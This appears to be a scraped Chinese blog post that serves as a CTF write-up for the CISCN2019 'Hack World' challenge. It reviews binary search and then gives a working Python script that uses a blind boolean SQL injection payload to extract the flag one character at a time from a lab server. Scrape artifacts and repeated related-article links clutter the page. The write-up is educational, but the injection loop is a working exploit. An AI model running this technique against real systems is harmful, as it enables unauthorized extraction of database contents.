簡單的注入腳本
涼涼,數據結構沒學好,二分法都忘了html
典型二分法
-
思路node
-
數據(data)爲升序排序,要在data中尋找定值keypython
-
從中間的 data[mid]開始尋找sql
-
key大於data[mid] : 從data[mid+1]~data[end]數據結構key小於data[mid] : 從data[start]~data[mid-1]postkey等於data[mid] : 結束url
-
[CISCN2019 華北賽區 Day2 Web1]Hack World
復現平臺在BUUCTFspa
<img src="https://files-cdn.cnblogs.com/files/thenbz3/buuoj-hackworld.bmp" width="200" hegiht="100" />code
import time
import requests
url = 'http://e208fef8-d158-4ae3-b566-0b6f9bdd4915.node1.buuoj.cn/'
flag = ''
for i in range(50):
#從33到126爲可打印的字符
low = 33
height = 126
data = {'id':''}
while low <= height :
mid = (low + height) // 2
data['id'] = 'if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)'%(i,mid)
html = requests.post(url,data).text
time.sleep(1)
if 'Hello' in html :
low = mid + 1
else:
#將小於和等於的狀況一塊兒考慮,因此在low~mid中間尋找
height = mid
#出現low = height = mid,若不判斷會進入死循環
if height == mid == low:
break
flag += chr(int(mid))
print(flag)
if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2) Sql 注入 要學的騷操做不少,一條一條積累吧,等一有時間就把sqli-lab刷了 hhhhcdn
相關文章
- 1. 簡單注入
- 2. 簡單的SQL腳本
- 3. 簡單的Shell腳本
- 4. es簡單的腳本demo
- 5. linux 簡單的shell腳本
- 6. 實驗吧簡單的SQL注入1,簡單的SQL注入
- 7. Linux簡單入門(十四)SHELL 腳本
- 8. tcl ,perl 腳本語言簡單入門
- 9. XSS注入,js腳本注入後臺
- 10. 簡單的sql注入1
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • Github 簡明教程
- • TiDB 在摩拜單車在線數據業務的應用和實踐
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 簡單注入
- 2. 簡單的SQL腳本
- 3. 簡單的Shell腳本
- 4. es簡單的腳本demo
- 5. linux 簡單的shell腳本
- 6. 實驗吧簡單的SQL注入1,簡單的SQL注入
- 7. Linux簡單入門(十四)SHELL 腳本
- 8. tcl ,perl 腳本語言簡單入門
- 9. XSS注入,js腳本注入後臺
- 10. 簡單的sql注入1